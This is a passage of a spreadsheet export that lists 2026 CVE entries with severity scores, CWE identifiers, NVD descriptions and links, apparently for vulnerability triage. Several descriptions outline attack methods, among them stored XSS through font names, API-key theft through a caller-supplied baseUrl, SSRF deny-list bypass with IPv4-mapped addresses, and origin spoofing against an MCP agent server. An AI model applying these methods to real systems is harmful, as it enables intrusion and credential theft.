A locally or physically positioned attacker (e.g., via a malicious sensor, counterfeit hardware module, or a Man-in-the-Middle on the communication bus) can exploit this vulnerability by injecting a crafted debug frame with a length byte exceeding 16.
This corrupts adjacent stack data, including the saved return address.
Furthermore, because the overflowed buffer is subsequently passed to a printf-style logging sink, the attacker can supply format string specifiers (e.g., %n) to execute arbitrary code on the host microcontroller/SoC or cause a reliable system crash (Denial of Service).</t>
        </is>
      </c>
      <c r="M2445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42804</t>
        </is>
      </c>
    </row>
    <row r="2446">
      <c r="A2446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47666</t>
        </is>
      </c>
      <c r="C2446" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2446" s="5" t="inlineStr"/>
      <c r="F2446" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2446" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2446" s="5" t="inlineStr"/>
      <c r="I2446" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2446" s="5" t="inlineStr"/>
      <c r="K2446" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2446" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through custom font family names, which are interpolated into a @font-face CSS rule and injected into the page as HTML without sanitization. Because the backend accepts an arbitrary font-family string and the frontend writes the resulting style through innerHTML, a name containing markup such as a closing style tag followed by a script can break out of the style element and execute JavaScript on the Penpot origin. The attack is passive: any team member who opens a file referencing the malicious font triggers script execution simply by rendering the page, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="M2446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47666</t>
        </is>
      </c>
    </row>
    <row r="2447">
      <c r="A2447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48766</t>
        </is>
      </c>
      <c r="C2447" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2447" s="5" t="inlineStr"/>
      <c r="F2447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2447" s="5" t="inlineStr"/>
      <c r="H2447" s="5" t="inlineStr"/>
      <c r="I2447" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2447" s="5" t="inlineStr"/>
      <c r="K2447" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2447" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 allow a low-privilege guest member of a workspace to exfiltrate stored OpenAI-compatible API keys by invoking the OpenAI model-listing helper with an attacker-controlled `baseUrl`. The vulnerable path decrypts the selected workspace credential, creates an OpenAI client with the secret in both `apiKey` and the explicit `api-key` header, and then sends the outbound request to the caller-supplied URL. Because the permission check accepts any readable workspace member and `listCredentials` reveals credential identifiers to guests, a guest can force the server to deliver the workspace secret to attacker infrastructure. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M2447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48766</t>
        </is>
      </c>
    </row>
    <row r="2448">
      <c r="A2448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48767</t>
        </is>
      </c>
      <c r="C2448" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2448" s="5" t="inlineStr"/>
      <c r="F2448" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2448" s="5" t="inlineStr"/>
      <c r="H2448" s="5" t="inlineStr"/>
      <c r="I2448" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2448" s="5" t="inlineStr"/>
      <c r="K2448" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2448" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 allow a low-privilege guest member of a workspace to obtain a live Google Sheets OAuth access token for that workspace by calling the Google Sheets helper `getAccessToken`. The vulnerable path checks only whether the caller has read access to the workspace, decrypts the stored Google OAuth credential, refreshes or retrieves the access token through the Google client, and returns the raw bearer token directly to the caller. Because guest members can also enumerate credential identifiers, a guest can mint and reuse the workspace's Google access token outside Typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M2448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48767</t>
        </is>
      </c>
    </row>
    <row r="2449">
      <c r="A2449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49222</t>
        </is>
      </c>
      <c r="C2449" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2449" s="5" t="inlineStr"/>
      <c r="F2449" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2449" s="5" t="inlineStr"/>
      <c r="H2449" s="5" t="inlineStr"/>
      <c r="I2449" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2449" s="5" t="inlineStr"/>
      <c r="K2449" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2449" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product question operations allow a low-privileged Vendor to manage questions under another Vendor's products. The admin/sql/sqlite/product_question.sql queries accept a caller-controlled product_question_id and do not verify product_question.product_id against product.admin_id for the current admin_id. An attacker can read pending question content and moderation data, change question status, edit question content, or delete questions, manipulating product Q&amp;A visibility and integrity. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M2449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49222</t>
        </is>
      </c>
    </row>
    <row r="2450">
      <c r="A2450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49223</t>
        </is>
      </c>
      <c r="C2450" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2450" s="5" t="inlineStr"/>
      <c r="F2450" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2450" s="5" t="inlineStr"/>
      <c r="H2450" s="5" t="inlineStr"/>
      <c r="I2450" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2450" s="5" t="inlineStr"/>
      <c r="K2450" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2450" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product review operations allow a low-privileged Vendor to manage reviews under another Vendor's products. The admin/sql/sqlite/product_review.sql queries accept a caller-controlled product_review_id and do not verify product_review.product_id against product.admin_id for the current admin_id. An attacker can read pending review content, ratings, author information, and moderation state, change review status, edit review content, or delete reviews, manipulating product review visibility and integrity. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M2450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49223</t>
        </is>
      </c>
    </row>
    <row r="2451">
      <c r="A2451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49227</t>
        </is>
      </c>
      <c r="C2451" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2451" s="5" t="inlineStr"/>
      <c r="F2451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2451" s="5" t="inlineStr"/>
      <c r="H2451" s="5" t="inlineStr"/>
      <c r="I2451" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2451" s="5" t="inlineStr"/>
      <c r="K2451" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2451" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend comment operations allow a low-privileged Author to manage comments under another Author's posts. The admin/controller/content/comment.php and admin/controller/content/comments.php controllers and the admin/sql/sqlite/comment.sql queries accept a caller-controlled comment_id without verifying comment.post_id against post.admin_id for the current admin_id. An attacker can read pending comment content and commenter email addresses, change moderation status, edit comment content, or delete comments, breaking author and moderation boundaries. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M2451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49227</t>
        </is>
      </c>
    </row>
    <row r="2452">
      <c r="A2452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53635</t>
        </is>
      </c>
      <c r="C2452" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2452" s="5" t="inlineStr"/>
      <c r="F2452" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2452" s="5" t="inlineStr"/>
      <c r="H2452" s="5" t="inlineStr"/>
      <c r="I2452" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2452" s="5" t="inlineStr"/>
      <c r="K2452" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2452" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 59bb6d6, the view function set_course_mode_price() at lms/djangoapps/instructor/views/instructor_dashboard.py:430 is decorated only with @login_required and performs no course-level permission check. Any authenticated user — including a learner account with zero course roles — can issue a single POST request to overwrite the honor mode price and currency of any course on the platform. The companion frontend modal was removed in a prior cleanup, but the URL route and view remain live, making this an unguarded orphan endpoint. This issue has been patched via commit 59bb6d6.</t>
        </is>
      </c>
      <c r="M2452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53635</t>
        </is>
      </c>
    </row>
    <row r="2453">
      <c r="A2453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53958</t>
        </is>
      </c>
      <c r="C2453" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2453" s="5" t="inlineStr"/>
      <c r="F2453" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2453" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2453" s="5" t="inlineStr"/>
      <c r="I2453" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2453" s="5" t="inlineStr"/>
      <c r="K2453" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-915</t>
        </is>
      </c>
      <c r="L2453" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.9, 4gaBoards allows an authenticated user to modify ssoGoogleId, ssoGoogleEmail, ssoGithubId, ssoGithubUsername, ssoGithubEmail, ssoMicrosoftId, ssoMicrosoftEmail, ssoOidcId, and ssoOidcEmail through PATCH /api/users/:id. The whitelist in server/api/controllers/users/update.js mass assigns these backend-managed identity attributes from user input. An attacker can place a victim's provider identifier on an attacker-controlled account, causing the default lookup in helpers such as server/api/helpers/users/get-create-one-for-github-sso.js to match the victim's first SSO login to the attacker's account before the email-linkage flow runs. The victim is logged into the attacker-controlled account, and projects, boards, or data the victim creates remain accessible through the attacker's original local credentials. This issue is fixed in version 3.3.9.</t>
        </is>
      </c>
      <c r="M2453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53958</t>
        </is>
      </c>
    </row>
    <row r="2454">
      <c r="A2454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54245</t>
        </is>
      </c>
      <c r="C2454" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2454" s="5" t="inlineStr"/>
      <c r="F2454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2454" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2454" s="5" t="inlineStr"/>
      <c r="I2454" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2454" s="5" t="inlineStr"/>
      <c r="K2454" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2454" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.86.2, the Okta conditional access integration in Fleet Premium is vulnerable to SQL injection through a host-supplied value that is used in a database query without proper parameterization, allowing an attacker who controls a single enrolled host to read or modify arbitrary data in the Fleet database. The value is reported by the host's own agent and stored verbatim, then used on an unauthenticated request path that supports the conditional access integration, so any party controlling one enrolled host, the lowest-privilege position in the product, can influence the query. By disclosing arbitrary database contents an attacker can extract stored session tokens and replay them to act as a global administrator, and on a managed fleet that administrator access enables running scripts on enrolled hosts, leading to remote code execution. The issue requires Fleet Premium with the Okta conditional access integration enabled and does not affect instances where it is not configured. This issue is fixed in version 4.86.2.</t>
        </is>
      </c>
      <c r="M2454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54245</t>
        </is>
      </c>
    </row>
    <row r="2455">
      <c r="A2455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55532</t>
        </is>
      </c>
      <c r="C2455" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2455" s="5" t="inlineStr"/>
      <c r="F2455" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2455" s="5" t="inlineStr"/>
      <c r="H2455" s="5" t="inlineStr"/>
      <c r="I2455" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2455" s="5" t="inlineStr"/>
      <c r="K2455" s="5" t="inlineStr">
        <is>
          <t>CWE-346, CWE-352</t>
        </is>
      </c>
      <c r="L2455" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, MCP HTTP Stream _validate_origin uses request_origin.startswith(allowed), allowing the attacker-controlled localhost.attacker.com HTTP origin to satisfy the localhost allowlist. A webpage can send Content-Type: text/plain requests without preflight and invoke tools/call without an API key, including file writes that persist agent instructions. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M2455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55532</t>
        </is>
      </c>
    </row>
    <row r="2456">
      <c r="A2456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55643</t>
        </is>
      </c>
      <c r="C2456" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2456" s="5" t="inlineStr"/>
      <c r="F2456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2456" s="5" t="inlineStr"/>
      <c r="H2456" s="5" t="inlineStr"/>
      <c r="I2456" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2456" s="5" t="inlineStr"/>
      <c r="K2456" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2456" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.3, a company-scoped user in FMCS floater mode can access users whose company_id is null because broad API queries and bulk web actions do not consistently apply isCurrentUserHasAccess. The /api/v1/users and /api/v1/users/{id}/licenses endpoints can expose personal data and assigned licenses, /users/bulkeditsave can modify out-of-scope profiles, and /users/merge can soft-delete users and transfer assigned assets. This issue is fixed in version 8.6.3.</t>
        </is>
      </c>
      <c r="M2456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55643</t>
        </is>
      </c>
    </row>
    <row r="2457">
      <c r="A2457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5846</t>
        </is>
      </c>
      <c r="C2457" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2457" s="5" t="inlineStr"/>
      <c r="F2457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2457" s="5" t="inlineStr"/>
      <c r="H2457" s="5" t="inlineStr"/>
      <c r="I2457" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J2457" s="5" t="inlineStr"/>
      <c r="K2457" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L2457" s="5" t="inlineStr">
        <is>
          <t>The affected Watchfire Controller Software contains self-signed hard-coded RSA private keys and corresponding X.509 certificates used for authenticating and encrypting HTTPS/TLS connections to the controller's built-in web management interface. These keys are embedded in plaintext within the application patch binaries in the firmware directly from Watchfire's Remote Support filestore.</t>
        </is>
      </c>
      <c r="M2457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5846</t>
        </is>
      </c>
    </row>
    <row r="2458">
      <c r="A2458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65822</t>
        </is>
      </c>
      <c r="C2458" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2458" s="5" t="inlineStr"/>
      <c r="F2458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2458" s="5" t="inlineStr"/>
      <c r="H2458" s="5" t="inlineStr"/>
      <c r="I2458" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2458" s="5" t="inlineStr"/>
      <c r="K2458" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2458" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.116.0 and 16.23.0, erpnext/selling/report/inactive_customers/inactive_customers.py accepts an unvalidated doctype filter and interpolates it into raw SQL in get_sales_details and get_last_sales_amt, allowing an authenticated user to extract sensitive information and manipulate database queries. This issue is fixed in versions 15.116.0 and 16.23.0.</t>
        </is>
      </c>
      <c r="M2458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65822</t>
        </is>
      </c>
    </row>
    <row r="2459">
      <c r="A2459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65935</t>
        </is>
      </c>
      <c r="C2459" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2459" s="5" t="inlineStr"/>
      <c r="F2459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2459" s="5" t="inlineStr"/>
      <c r="H2459" s="5" t="inlineStr"/>
      <c r="I2459" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2459" s="5" t="inlineStr"/>
      <c r="K2459" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="L2459" s="5" t="inlineStr">
        <is>
          <t>Passkey entry Bluetooth LE legacy pairing can be bypassed in the RS9116W and SiWx917 by manipulating the temporary key value. 
See vulnerability B-E3 in the related paper below.</t>
        </is>
      </c>
      <c r="M2459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65935</t>
        </is>
      </c>
    </row>
    <row r="2460">
      <c r="A2460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68900</t>
        </is>
      </c>
      <c r="C2460" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2460" s="5" t="inlineStr"/>
      <c r="F2460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2460" s="5" t="inlineStr"/>
      <c r="H2460" s="5" t="inlineStr"/>
      <c r="I2460" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2460" s="5" t="inlineStr"/>
      <c r="K2460" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2460" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. From 8.72 until 10.23, addBoardHTMLToZip() in client/lib/exportHTML.js read a card title and body through textContent, which decoded entity-encoded markup, and then interpolated titleText and allText into content.innerHTML in the exported index.html. A board member could store an entity-encoded event-handler payload in a card title that remained inert on the live board but was reparsed and executed when a recipient clicked the card in the downloaded HTML export, allowing the script to read and transmit all board data contained in that export, including content added after the attacker's membership was removed. Version 10.23 builds the modal with DOM nodes and assigns untrusted values through textContent. This issue is fixed in version 10.23.</t>
        </is>
      </c>
      <c r="M2460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68900</t>
        </is>
      </c>
    </row>
    <row r="2461">
      <c r="A2461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69257</t>
        </is>
      </c>
      <c r="C2461" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2461" s="5" t="inlineStr"/>
      <c r="F2461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2461" s="5" t="inlineStr"/>
      <c r="H2461" s="5" t="inlineStr"/>
      <c r="I2461" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2461" s="5" t="inlineStr"/>
      <c r="K2461" s="5" t="inlineStr">
        <is>
          <t>CWE-1389, CWE-918</t>
        </is>
      </c>
      <c r="L2461" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise's HTTP security module httpSecurity.ts did not normalize IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1 and ::ffff:169.254.169.254 before checking them against the deny list. Because ipaddr.js reports these addresses as ipv6 while IPv4 CIDR deny-list entries are ipv4, isDeniedIP() skipped the IPv4 CIDR checks. An attacker who controls DNS resolution for a hostname used by the HTTP Node, API Chain, Document Loader, MCP tool, or other paths using secureAxiosRequest(), secureFetch(), or checkDenyList() could return a AAAA record for an IPv4-mapped target and cause requests to reach localhost, internal services, or cloud metadata endpoints. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M2461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69257</t>
        </is>
      </c>
    </row>
    <row r="2462">
      <c r="A2462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70454</t>
        </is>
      </c>
      <c r="C2462" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2462" s="5" t="inlineStr"/>
      <c r="F2462" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2462" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H2462" s="5" t="inlineStr"/>
      <c r="I2462" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2462" s="5" t="inlineStr"/>
      <c r="K2462" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2462" s="5" t="inlineStr">
        <is>
          <t>rsync 3.2.0 through 3.2.3 (openssl mode) and rsync-ssl through 3.4.4 (stunnel mode) contain a TLS certificate validation vulnerability that allows on-path attackers to intercept encrypted sessions by presenting self-signed or otherwise invalid certificates. Attackers can exploit the failure to validate server TLS certificates against a trusted CA or verify certificate hostname matching to decrypt or tamper with rsync session content without detection by the client.</t>
        </is>
      </c>
      <c r="M2462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70454</t>
        </is>
      </c>
    </row>
    <row r="2463">
      <c r="A2463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70474</t>
        </is>
      </c>
      <c r="C2463" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2463" s="5" t="inlineStr"/>
      <c r="F2463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2463" s="5" t="inlineStr"/>
      <c r="H2463" s="5" t="inlineStr"/>
      <c r="I2463" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2463" s="5" t="inlineStr"/>
      <c r="K2463" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2463" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to 3.1.3, Flowise has three OAuth2 credential endpoints that look up credentials by id alone with no workspaceId filter. The authorize, callback, and refresh handlers query the Credential table by id only; callback and refresh are whitelisted from authentication. This allows any authenticated user to initiate OAuth2 flows against credentials belonging to other workspaces, allows an unauthenticated attacker to forge OAuth2 callbacks to overwrite tokens in any credential, and allows an unauthenticated attacker to refresh tokens for any credential. The affected routes include /api/v1/oauth2-credential/authorize/&lt;VICTIM_CREDENTIAL_UUID&gt;, /api/v1/oauth2-credential/callback?code=ATTACKER_AUTH_CODE&amp;state=&lt;VICTIM_CREDENTIAL_UUID&gt;, and /api/v1/oauth2-credential/refresh/&lt;VICTIM_CREDENTIAL_UUID&gt;. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M2463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70474</t>
        </is>
      </c>
    </row>
    <row r="2464">
      <c r="A2464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71048</t>
        </is>
      </c>
      <c r="C2464" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D2464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2464" s="5" t="inlineStr"/>
      <c r="F2464" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2464" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2464" s="5" t="inlineStr">
        <is>
          <t>oracle:product_lifecycle_analytics</t>
        </is>
      </c>
      <c r="I2464" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2464" s="5" t="inlineStr"/>
      <c r="K2464" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
